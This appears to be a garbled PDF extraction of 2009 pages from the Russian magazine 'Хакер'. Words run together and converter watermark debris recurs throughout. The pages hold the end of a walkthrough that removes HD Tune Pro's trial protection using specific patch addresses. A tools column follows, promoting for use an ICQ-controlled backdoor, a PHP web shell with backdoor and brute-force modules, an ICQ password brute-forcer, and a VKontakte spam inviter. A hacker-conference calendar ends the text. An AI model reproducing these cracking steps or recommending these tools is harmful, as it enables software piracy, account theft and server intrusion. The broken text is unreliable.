ставимнанихбрякиизапускаемопятьпрогу. |
MessageBoxA сруганьюобобломепользователейсWindows |
Вообще, смыслраскрутавсейцепочки, думаю, понятен |
95\98\ME… Длятех, ктохочетсделатьнаоборот: наградить |
(конечно, болееуниверсальныйметодприбольшомколи- |
юзеровэтихверсийподдержкойнашейисследуемой |
чествевызововиеслипозволяютмощностиЦП— ставить |
программыиобломатьюзеров Windows XP, Vista — нужно |
брякпоусловию, жать<Ctrl+T> итрассироватьсзаходомв |
поадресу00415A57 исправитьJNE наJE. Толькогарантии |
процедурыпо<Ctrl+F11>). Вопрос: докакогомоментавсе |
работыпослеэтогона95\98\МЕявсеравнонедам. |
этокрутить? Сейчасувидишь! Нашаподопытнаяфункция |
ВСЕКРЕТНЫХ |
вторичнобудетвызванапоадресу0045С552 втелефункции |
|
0045С516. Упоследнейдвавозможныхлокальныхвызова, |
ПОДЗЕМЕЛЬЯХ |
изнихсработалтолько004158E8. Вот, кажется, иприехали! |
Еслимызнаемпримерноеместо, гденадоискать(амыего |
Последнийвызовпроисходитвтелегромаднойфункции |
ужезнаем), тозачастуюхватаетвизуальногоанализадля |
(остальныебылинеболее20 строкассемблерногокода). |
определениязащитногомеханизма. Этосэкономитвремя, |
Надобыеепросмотреть! Посленепродолжительного |
авремя— деньги! Наличиекомментариев(дляаргумен- |
скроллингавнизнатыкаемсяназаносвофсетуказате- |
тов), которымиОльгаснабдилафункции, накартинкевыше |
лянастроку«%s (trial version)» (00415A2B). Затембудет |
говоритнам, чтоcall поадресу00415A50 долженпроверять |
вызовфункциибезаргументов, ипотомвызовфункции |
версиюOS, аcall 00415A1E береткэпшн(caption) глав- |
саргументом(00415A43). Исходяизэтого, замечаем, что |
ногоокнапредтем, какприклеитьтудасообщение«Trial |
строка«%s (trial version)» должнагде-товсплыть. Особенно |
Version». Видишь, тутвсевзаимосвязано! |
еслиесть%s, — вместонеедолжнобытьзаданозначение. А |
Тебявпервуюочередьдолжензаинтересоватьcall |
незашифрованныестрокиговорятотом, чторазработчики |
00415D30 (поадресу00415ABE). Скореевсего, функция |
думаютчерезраз! Поперекрестнымссылкамможно, какпо |
поадресу00415D30 должнабытьсвязанаслогическими |
бульвару, добратьсядозащитногомеханизма. Этосущест- |
дисками— внизуводномизаргументовкрасуется«No disk |
венносэкономитвремя. Ноинтересныенамаргументы(Trial |
found» (тривиальныйвызовMessageBoxA). Утебядолжны |
version, trial period expired) расположеныдостаточнодалеко |
возникнутьподозрения, чтоздесьбудетчто-тоинтерес- |
друготдруга, какпоадресам, такипоходувыполнения. Не |
ное. Наглазасразупопадаютсянесколькосравненийи |
очень-тоудобно. Надосмотреть, чтопередаетсяваргумент |
условныхпереходов, вдобавокперединтересующейнас |
функции(содержимоеECX). |
функцией— цепочкаприсваиваний(особенноинтересно, |
Послевызовабезаргументнойфункцииидутинструкции |
чтоздесьфигурируют1 и0 — похоженафлагрегистрации). |
выталкиванияизстека12 байт, затемприсвоениеECX |
Нуиповерхунас— операциис«trial version». Мотивации |
содержимогостекасосмещением90h имногодругихнеин- |
длядетальногоисследованиявполнедостаточно. Ну, ачто- |
тересныхвещей. Короче, ставимбрякнааргументивидим, |
бысделать100% мотивациюдляисследования— перейди |
чтовстекепозаданномусмещениюнаходитсяHD Tune Pro |
поадресу00415ABE, жминапробеливводиинструкцию |
3.50 (trial version), чтоявляетсязаголовкомглавногоокна! |
JMP 00415C2B (путьназначенияпереходабудетcall, отве- |
АсамCALL 00461CC9 представляетсобойтривиальный |
чающийзатривиальныйвызовAPI EnableWindow). Готово? |
вызовSetWindowTextA (перейдипоадресуCall’а) — функ |
Запускай! Нуичтомывидим? :). |
ции, котораяизанесетновыйзаголовок. Афункциябез |
Упс! НедоступноComboBox. Исправьpush 0 наpush 1, где |
аргументовпростовставитвместо%s первичныйзаголовок |
вызов— тривиальныйEnableWindow, окоторомречьшла |
окнапрограммы. Каквидишь, теперьситуациянесколько |
чутьвыше. Воттеперьвсе. Однаконасамомделеэтоеще |
прояснилась. Дальшедолжнобытьинтересней! Тысейчас |
далеконевсе! Собственно, вComboBox отсутствуютнаиме- |
можешьвозразить— какжетак, мыпросмотрелисамое |
нованиятвоихжесткихдисков. Агдеони? Полминутыназад |
интересное, выходит, чтопрограммаужезнает, чтоверсия |
тызаджампилфункциюихинициализацииивбиванияв |
просроченаипеределалазаголовококна. Нуичто? Если |
комбо! ТольковотнашNAG тоженепоявился! |
брякинаcmp eax, 0Fh досихпорутебястоят, товидно, что |
Догадываешься, почемутакпроисходит? Всепотому, что |
ихвыполнениесработаетпослеподменызаголовкаглавно- |
разработчикикомбинировалипроцедуруинициализации |
гоокна. Даивообще— ктопомешаетпрогетакжеобратно |
логическихдисковипоказNAG’аслогоокошка. Ты, конеч- |
072 |
XÀÊÅÐ 09 /129/ 09 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
|
PEID ВДЕЙСТВИИ. ПРОТЕКТОРОВИПАКОВЩИКОВ |
ВХОДВСЕКРЕТНЫЕПОДЗЕМЕЛЬЯ |
НЕНАБЛЮДАЕТСЯ |
|
РАССТАВЛЯЕМБРЯКИПОАДРЕСАМЛОКАЛЬНЫХ ВЫЗОВОВНАШЕЙФУНКЦИИ
РАЗРАБОТЧИКИЛЮБЯТИГРАТЬСРЕВЕРСЕРАМИВ ИГРУ«АОТКУДАВЫЗОВПРИШЕЛ?»
но, можешьзайтипоадресу00415D30 иначатьегоисследовать, номы зайдемстыла! Этобыстрееилучше. ИщибыстренькоAPI ShowWindow, котораяотвечаетзапоказNAG — уменябрякпередпоказомсработал поадресу00461DF3.
Единственное, начемещеможнонемногозаостритьвнимание, это использованиеEAX+1C какнекоторогостандартадляпередачиhandle- окнаAPI-функциямтипаEnableWindow. Естественно, длякаждогоокна будетсвойидентификатор. Так, послеустановкизаголовкаглавного окна«HD Tune Pro 3.50 (Trial Version)» содержимоеEAX+1C будетпе-
ренесеновСтек(EBP-14). КмоментупоказаNAG здесьсобственноуже будетхэндлокнаNAG. Восстановимцепочкувызовов, конецкоторой приводиткпоказулоготипаокошка. Этоможносделатьпостановкой бряковназавершениефункциии«single step» послеегосрабатывания. Итеперьмыокажемсянаинструкциюнижекоманды, котораявызвала подопытнуюфункцию.
00462982(00462A5E) -> 004615Ñ9(04613A) -> 00461DE5 (00461DF3)
Авототкудабудетвызвана00462982, мы, ксожалению, никакнеузнаем, таккак ниодинбрякнесработал:(. Впрочем, этодаженикакаянеошибка! Дляисправленияситуациипростоставимбрякпоадресу00462AE1 (RET), чтоявляетсяконцомнашейтекущейфункции, ипослеостановки инажатия<F8> (пошаговойтрассировки) мыинаходимнашадрес вызова(онбудетнаходитьсянаоднуинструкциювыше) — 00416125
скодомCALL DWORD PTR DS:[EAX+0B8] или, еслипоставитьбряки подсмотретьзначение, онобудетравняться«CALL 462982». Этоесть неявныйвызовфункции!
Всеэтоиспользуетсядлятого, чтобытакие, какмы, немоглибыстро восстановитьместоназначениявызоваи, какследствие, — сорватьвсю цепочку. Впрочем, еслиестьвозможность, можнопростоставитьбряк нанеявныйвызовипотомсмотреть, чтотамунасвстекеподанному смещению. ЕщеоднойнемаловажнойдетальюдлятебябудетисследованиеусловиядлявходавфункциюпоказаNAG. Вбольшинстве случаевключкразгадкекроетсяименнопередпрыжкомсусловием. Ну и, наконец, взгляни, гденаходитсявызов— этотелодоболизнакомой
XÀÊÅÐ 09 /129/ 09
ОПРЕДЕЛЯЕМПОЛОЖЕНИЕСИСТЕМНОЙБИБЛИОТЕКИUSER32 ВПАМЯТИНАШЕГОПРОЦЕССА
намфункцииинициализацииивбиваниявComboBox именлогических дисков, которуюмызаджампиливпрошлыйраз.
ЗАКЛЮЧЕНИЕ
Описывать все действия, которые делаются в этой нехитрой проге, нет нужды — уйдет целый журнал. Но ведь я тебе раскрыл самый главный смысл! Есть карта, а остальное можно разобрать самостоятельно.
Ялишьскажу, что, несмотрянавсеоружиесовременныхпрограммеров поборьбесозлостнымиреверсерами, взломзащиты— лишьделовремени. Этонепоколебимаяистина. Еслисмотретьсоднойстороны— то задостаточножуткийвидкода(диапазонвызововвтелеоднойфункции ограничиваетсятолькоеедлиной, неявныевызовы, нуиразбросан- ностьвсеготриал-модуля) разработчиковнадобыхорошенькоотшлепать! Сколькожмашинныхинструкцийтратитсянепоназначению! Где она— оптимизация?
С другой стороны, такая защита тянет на уверенную тройку — запутанность и неявные вызовы это, конечно, неплохо, но явных противодействий отладчику нет, равно как вызовы из системных библиотек открыты, можно свободно гулять по перекрестным ссылкам. Да, плюс ко всему, часть функций расположена строго друг за другом, что значительно упрощает анализ. А это только на руку таким реверсерам, как мы.z
073
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
||||
|
|
|
|
X |
|
|
|
|
|
|
||||
|
|
- |
|
|
|
|
|
|
d |
|
|
|||
|
|
|
F |
|
|
|
|
|
|
|
t |
|
|
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
|
r |
||||
|
P |
|
|
|
|
|
|
|
NOW! |
o |
|
|||
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
Click |
|
to |
BUY |
|
|
|
|
|
ВЗЛОМ |
|
|
w |
|
|
|
|
|
|
|
|
ЛЕОНИД «R0ID» |
||||
|
|
|
|
|
|
|
|
|
m |
|||||
w |
|
|
|
|
|
|
|
|
|
o |
|
|||
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
|
. |
|
|
|
|
|
|
|
.c |
|
|
||
|
|
|
|
p |
|
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
d |
f |
|
|
n |
e |
|
|
||
|
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
|
X |
|
|
|
|
|
|||
|
|
- |
|
|
|
|
|
d |
|
||
|
|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
|
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
|
to |
|
|
|
|
|
|
СТРОЙКОВ R0ID@BK.RU |
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
||||||
w |
|
|
|
|
|
|
|
|
|
||
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
|
-x cha |
|
|
|
|
>> взлом
Программы для хакеров
ПРОГРАММА:ICQBLACKDOORALENKA ОС:WINDOWS2000/XP АВТОР:CA5PER&NEO][ACK
ЗаменарадминунабазеICQ
Вповседневнойработемычастоиспользуем дедики, своииличужие— такилииначе, все ихнужноконтролировать. Способовмасса
— начинаяотremote-десктопаизаканчивая Radmin’ом. Нокакбыть, еслихочетсяиметь доступксерверукруглосуточно? Регулярно таскатьссобойноутнеудобно, номобильник-то всегдавкармане:). Нет, яговорюнеореализа- цииremote-десктопадлямобильныхплатформ. Естьспособнамногопрощеиудобнее— утила
«ICQ Black Door Alenka». Тулзапозволяет управлятьудаленнымдедикомпосредством ICQ-протокола, используявкачествеклиента обычнуюасю. Дабыввеститебявкурсдела, рассмотримдоступныекомандысофтины:
-ShowDesk — отобразить иконки рабо- чего стола
-HideDesk — скрыть иконки на рабочем столе
-ShowStart — отобразить меню «Пуск»
-Hidestart — скрыть меню «Пуск»
-ShowTaskBar — отобразить таскбар
-HideTaskBar — скрыть таскбар
-ShowClock — отобразить часы
-HideClock — скрыть часы
-TimePC — узнать время юзера
-TimePowerPC — отобразить время работы сеанса юзера
-Command — список комманд
-Cdo — открыть CD/DVD-привод
-Сdc — закрыть CD/DVD-привод
-Info — информация
-Off — выключить комп
-Reboot — ребут компа
-Msl — клик левой кнопкой мыши
-Msr — клик правой кнопкой мыши
-Msm — клик средней кнопкой мыши
-Vk_enter — нажать enter
-Vk_escape — нажать escape
-Vk_space — нажать space
074
- DriveList — отобразить список дисков
- Getclb — получить буфер обмена (текст)
- Setclb: — добавить в буфер обмена (текст)
- Close — закрыть клиент
- GetProc — получить список процессов - ConPass — пароль соединения
- Author — инфа о разработчиках - Filelist: — список директорий и
|
|
|
|
||||||
файлов в выбранном каталоге |
|
Функциональныйвеб-шелл |
|||||||
- Setcursor: — перемещение курсора |
|
|
|||||||
мыши в указанную точку |
|
|
|||||||
- Delfile: — удаление файла |
палнаweb-шеллподзамысловатымназвани- |
||||||||
- Killdir: — удаление каталога |
ем«PHPbaG-}|{y]{-sHell». НаписаноннаPHP и |
||||||||
- Open: — открыть файл |
веситпорядка100 Кб. Изосновныхвозможнос- |
||||||||
- Uploadfile: — залить файл на FTP |
тейследуетвыделить: |
||||||||
- NumberHD: — задать жесткий диск |
|
|
|||||||
- OpenUrl: — открыть ссылку в дефолт- |
- Файловый менеджер - наличие возмож- |
||||||||
ном браузере |
|
|
ности визуального управления файла- |
||||||
- SetWall: — параметры рабочего стола |
ми, открытие/чтение/редактирование/ |
||||||||
- KillProc: — убить процесс |
загрузка/хекс-просмотр/копирование/ |
||||||||
- GetPathProc — путь процесса |
перемещение/удаление файлов |
||||||||
- OpenTXT: — прислать текст из файла |
- Аплоад файлов — ограничение по раз- |
||||||||
- ScreenShot:<качество> — прислать |
меру (2 метра) |
|
|||||||
скриншот экрана на FTP |
- Редактор — редактирование любых |
||||||||
- Mail:<êîìó>,<îò êîãî>,<èìÿ îò |
файлов, при наличии соответствующих |
||||||||
кого>,<тема письма>,<текст письма> — |
ïðàâ |
|
|||||||
отправить письмо на мыло |
- CMD — консоль |
||||||||
- MessageWarn:<Текст>,<Заголовок> — |
- Бэкдоры — возможность установки в |
||||||||
вывести на десктоп юзера сообщение :) |
системе перл/ехе bind-файлов |
||||||||
- CopyFile:<Старый файл>,<Новый |
- Safe-mode — функции веб-шелла при |
||||||||
файл> — скопировать файл |
работе с Safe_Mode ON |
||||||||
- CopyDir:<Старая директория>,<Куда |
- SQL - стандартный модуль работы с |
||||||||
копировать> — скопировать каталог |
базой данных |
|
|||||||
|
|
|
|
|
|
|
|
- FTP - анонимный коннект с шела на |
|
Утилаобладаетнеслабымфункционалом. |
фтп-сервер |
|
|||||||
Конечно, полноценнозаменитьгуишный |
- Mail — возможность анонимной от- |
||||||||
интерфейсонанесможет, однакозаменить |
правки писем, а также возможность |
||||||||
консоль— вполне. |
рассылки по собственному маил-листу |
||||||||
P.S. Юзатьтулзуилинет— решатьтебе, сорцы |
- Evaler - интерпретатор пхп-кода в |
||||||||
найдешьнанашемдиске:). |
системе |
|
|||||||
|
|
|
|
|
|
|
|
- Сканеры — сканирование сервера на |
|
|
|
|
|
|
|
|
|
открытые порты, часто используемые |
|
|
|
|
|
|
|
|
|
|
|
ПРОГРАММА: |
PHPBAG-}|{Y]{-SHELL |
пароли, etc |
|||||||
ОС: |
*NIX/WIN |
|
|
- Крэкеры — брут пассов по словарю и |
|||||
АВТОР: |
WINNER13-ЖУК |
|
методом перебора (Hash /SMTP/POP3/ |
||||||
Возвращаяськстаройдобройтрадиции— пуб- |
IMAP/FTP/SNMP/MySQL/MSSQL/HTTP |
||||||||
ликациииописаниюразличныхweb-шеллов, |
Form/HTTP Auth) |
||||||||
долженотметить, чтозапоследнеевремямне |
- Pr0xy — встроенный анонимайзер |
||||||||
попалосьнесколькоинтересныхскриптовпо- |
- Тулзы — набор полезных утил, та- |
||||||||
добногорода. Уместитьихвсеводномвыпуске |
ких как: Whois, генерация файлов |
||||||||
Х-Тулзпопростуневозможно, поэтомувремяот |
.htaccess/.htpasswd, etc |
||||||||
времениябудувыкладыватьнаиболееудачные |
- Конвертация — конвертирование |
||||||||
экземплярынанашемдиске. Вэтотразвыбор |
строк в md5, sha1, hex, etc |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
XÀÊÅÐ 09 /129/ 09 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|||
|
F |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
t |
|
||
P |
D |
|
|
|
|
|
|
|
|
o |
|
|
|
|
|
NOW! |
r |
||||||
|
|
|
|
|
BUY |
|
|
||||
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
m |
|
w Click |
|
|
|
|
|
|
o |
||||
|
w |
|
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
|
e |
|
||
|
|
df |
|
|
|
gКрометого, скриптотображаетмаксимально |
|||||
|
|
|
|
|
n |
|
|
|
|
||
|
|
|
|
-xcha |
|
|
полнуюинформациюосервере, накотором |
||||
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
размещен: |
Server: |
blablabla.com (IP) |
|
Operation system: |
Linux |
server.domain.com 2.6.18-92.1.18. el5.028stab060.2 #1 SMP Tue Jan 13 18:16:58 MSK 2008 i686
Web server application: Apache/2.2.3 (Red Hat) CPU: Unknow
Disk status: Used spase: 22.47 GB Free space: 118.93 GB Total space: 141.4 GB
User domain: Unknow User name: DUM
UID — GID: 500 — 500
Recommended local root exploits: prctl, kmdx, newsmp, pwned, ptrace_ kmod, ong_bak
Passwd file: Readable
cPanel: Unknow (Log file: Not found)
PHP version: 5.1.6 Zend version: 2.1.0
Include path: ./usr/share/pear /usr/ share/php
PHP Modules: libxml xml wddx tokenizer (0.1) sysvshm sysvsem sysvmsg standard (5.1.6) SimpleXML sockets SPL shmop session Reflection pspell posix mime_magic (0.1) iconv hash (1.0) gmp gettext ftp exif (1.4 $Id: exif.c,v 1.173.2.5 2006/04/10 18:23:24 helly Exp $) date (5.1.6) curl ctype calendar bz2 zlib (1.1) pcre openssl apache2handler apc (3.0.19) dbase mysql (1.0) mysqli (0.1) PDO pdo_mysql (1.0.2) pdo_ sqlite (1.0.1)
Disabled functions: Nothing Safe mode: OFF
Open base dir: OFF DBMS: MySQL
Ещеоднимдостоинствомweb-шеллаявляет- сясовместимостьсwin-системами,такчтоне придетсянапрягатьсявпоискахинструментадля управленияломанымвиндовымсервером.
ПРОГРАММА:.BRUTALV.0.7.1 ОС:WINDOWS2000/XP
АВТОР: NTM
Еслитырешилобзавестиськрасивымicqномерком, илижепродажауиновпомогает тебенаскрестинапиво— безфункциональногоинструментанеобойтись. Именнотаким являетсяутила.Brutal, недавнообновившаяся доверсии0.7.1. Тулзапредставляетизсебя многопоточныйбрутфорсерасексобилием полезныхфичей:
1.Поддержка соксов/проксиков: https, socks4, socks5
2.Возможность автоматической очистки дохлых проксиков по таймеру
3.Возможность ручной очистки прок- си-листов: Cleanup All, Cleanup
XÀÊÅÐ 09 /129/ 09
Удобныйинструментдлябрутаасек:) |
HTTPs, Cleanup Socks4, Cleanup
Socks5
4.Регулировка количества потоков
5.Функция TimeOut, первое поле — таймаут на подключение (в секундах), второе — таймаут на чтение/запись (в секундах)
Утилаиспользуетнесколькофайлов:
• source.txt — здесьлежатзаписивида уин;пасс, например:
123456;qwerty1
111122;qwerty2
111222;qwerty3
111112;qwerty4
• list.txt — здесьуказываемспискидлябрута, каждыйизуказанныхфайловдолженсодержатьзаписивидауин;пасс:
source1.txt
source2.txt
source3.txt
• servers.txt — сюдавбиваемсписокip:port ICQ-серверов, рекомендуетсяуказыватьпорт 443, например:
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Функциональныйинвайтер
тулзазайметдостойноеместовтвоемнаборе повседневныхутил.
ПРОГРАММА:PUHOVOIINVITER ОС:WINDOWS2000/XP
АВТОР: ПУХОВОЙ
Сростомпопулярностисоциальныхсетей растетиколичестворазнообразногософтадля них. Настраницахжурналаянеразвыкладывалинтересныеутилыподобногорода, поэтому перейдемксофту. Сегодняяхочуобратить твоевниманиенатулзуподназваниемPuhovoi Inviter. Прогапредназначенадляавтоматизацииинвайтингановыхюзероввгруппына www.vkontakte.ru. Изособенностейутилы можновыделить:
•Поддержка многопоточности (<= 500 потоков)
•Возможность работы через acservice (сервис автоматического распознавания капчи)
•Возможность использования проксилиста
•Встроенный прокси-чекер
•Функция сохранения настроек
•Функция проверки баланса в acservice
•Ведение полного логирования всех действий утилы
Стоитотметить, чторассылкаприглашений— неединственнаяфункцияутилы, ибофункционалеенамногошире:
64.12.200.89:443
205.188.251.43:443
205.188.251.11:443
205.188.251.6:443
205.188.251.16:443
205.188.251.21:443
205.188.251.26:443
205.188.251.31:443
•https.txt — списокпроксиков(ip:port)
•socks4.txt — списоксокс4 (ip:port)
•socks5.txt — списоксокс5 (ip:port)
•good.txt — сюдазаписываютсявалидные парыуин;пасс
•config.txt — конфигутилы, создаетсяавтоматически, записивида:
Threads = 100
ConnectionTimeout = 15
ReadTimeOut = 10
CleanUp = 5
Словом, еслитыувлекаешьсябрутомасек—
•Приглашение новых юзеров в группу по списку ID, с использованием 1-го или нескольких аккаунтов
•Ведение блэк-листа — в случае, если юзер запретил отправку приглашений, он заносится в блэк-лист
•Встроенный ID-парсер — в случае отсутствия ID-листа его можно собрать с помощью утилы, используя разнообразные критерии поиска: пол, город, страна, год рождения, положение, онлайн/оффлайн, новые/старые анкеты
•Возможность работы с группой путем удаления неактивных юзеров с дальнейшим добавлением их в áëýê-ëèñò
•Встроенный чекер аккаунтов — позволяет прочекать на валидность список имеющихся аккаунтов
Софтинапредставляетсобойудобныйнабор,состоящийизнебольшихутил.Такчто,смелосливай ееснашегодиска—пригодитсяещенераз.z
075
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
|
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
|||
P |
|
|
|
|
|
NOW! |
o |
|
|
||||
|
|
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
СЦЕНА |
|
|
w Click |
|
|
|
|
|
|
|
МАРИЯ «MIFRILL» НЕФЕДОВА / MIFRILL@REAL.XAKEP.RU / |
|||||
|
|
|
|
|
|
|
|
||||||
|
|
|
|
|
|
m |
|||||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
|
|
. |
|
|
|
|
|
|
.c |
|
|
|
|
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
|
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
1)БиллГейтснафорумеRSA
2) ТакаятемнаякомнатабылаоборудовананаCCC
3)ОбычнаякартинадлялюбойIT-конференции
4) АудиториянаDeepSec
Где
отвисать
остаток
года
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
Календарьхакерскихтусовок наосень-зиму2009
Представляемтвоемувниманиюкалендарьвсевозможныхконференций, форумов, фестивалей, демо-патиидругихинтересныхсобытийнаостатоктеку- щегогода. Читай, выбирайивперед— социализироваться!
ПАРАСЛОВОDEFCON |
представители крупнейших |
Hat и CeBIT уже прошли, не ими |
ниодногокрупногоирегулярного |
Вместовступления позволь рас- |
IT-компаний, юристы, пред- |
одними жив наш брат. |
мероприятиятакогорода, иим |
сказать тебе, что совсем недав- |
ставители «органов» и толпы |
FRHACK 01 |
сталообидно. Новместотого |
но в славном городе Лас-Вегасе |
журналистов. Занятие на Defcon |
чтобысидетьирасстраиваться, |
|
(в том самом, где блек-джек и |
находится всем. Кто-то слушает |
КОГДА: 7-11 сентября |
придумалииорганизовалисебе |
падшие женщины) отгремела |
лекции (а кто-то их читает :)), |
ГДЕ: Безансон, Франция |
FRHACK. |
одна из главных хакерских |
кто-то обзаводится полезны- |
САЙТ: www.frhack.org |
Ожидается, что конфа возь- |
тусовок планеты — Defcon. Это |
ми связями, кто-то участвует |
Французскаяконференция |
мет с места в карьер и примет |
мероприятие на протяжении вот |
во всевозможных хакерских |
FRHACK позиционируетсякак |
порядка полутора тысяч гостей |
уже 17 лет (вдумайся в цифру) |
конкурсах, а кто-то предпочи- |
перваямеждународнаяконфа, |
из разных стран мира (офици- |
неизменно проводится именно |
тает нехакерские, но не менее |
созданнаяхакерамидляхакеров. |
альные языки мероприятия |
в Вегасе и собирает тысячи |
веселые состязания. |
Ребята, конечно, немногольстят |
— английский и французский). |
человек со всего мира. Что |
Любопытно и то, что Defcon — |
себе, ноэто, вобщем-то, прости- |
За 4 дня эти люди собираются |
забыли там все эти люди? Они |
мероприятие в некотором роде |
тельно. |
обсудить самые разнообразные |
приезжают на одно из круп- |
элитарное. Здесь собираются |
НазваниеFRHACK происходитот |
топики — на повестке дня темы |
нейших хакерских собраний на |
именитые гуру и признанные |
сплаваназванийдвухизвестных |
от руткитов и криптографии до |
нашем шарике, и год от года оно |
гении, и за 17 долгих лет конфе- |
езинов— французского«FrHack» |
хардварь хакинга и вопросов |
оправдывает их ожидания. |
ренция не опопсела ни на йоту, |
илегендарного«Phrack». Вэтом |
безопасности SCADA-систем. |
Чего и кого здесь только не |
«левых» скрипт-киддисов ты тут |
годуконференциясостоится |
Среди докладчиков обещают |
встретишь — ведущие специ- |
точно не встретишь. |
впервые, начтонамявнонамека- |
быть гуру свободного ПО Ричард |
алисты в области информаци- |
Звучит чертовски заманчиво, |
етприставка01 вназвании. Дело |
Столлман, Девид Халтон aka |
онной безопасности, именитые |
верно? Что ж, хотя громкие ме- |
втом, чтофранцузынедавно |
h1kari и другие, не менее инте- |
хакеры, крэкеры и иже с ними, |
роприятия вроде Defcon, Black |
сообразили, чтовихстраненет |
ресные личности. |
076 |
XÀÊÅÐ 09 /129/ 09 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
||
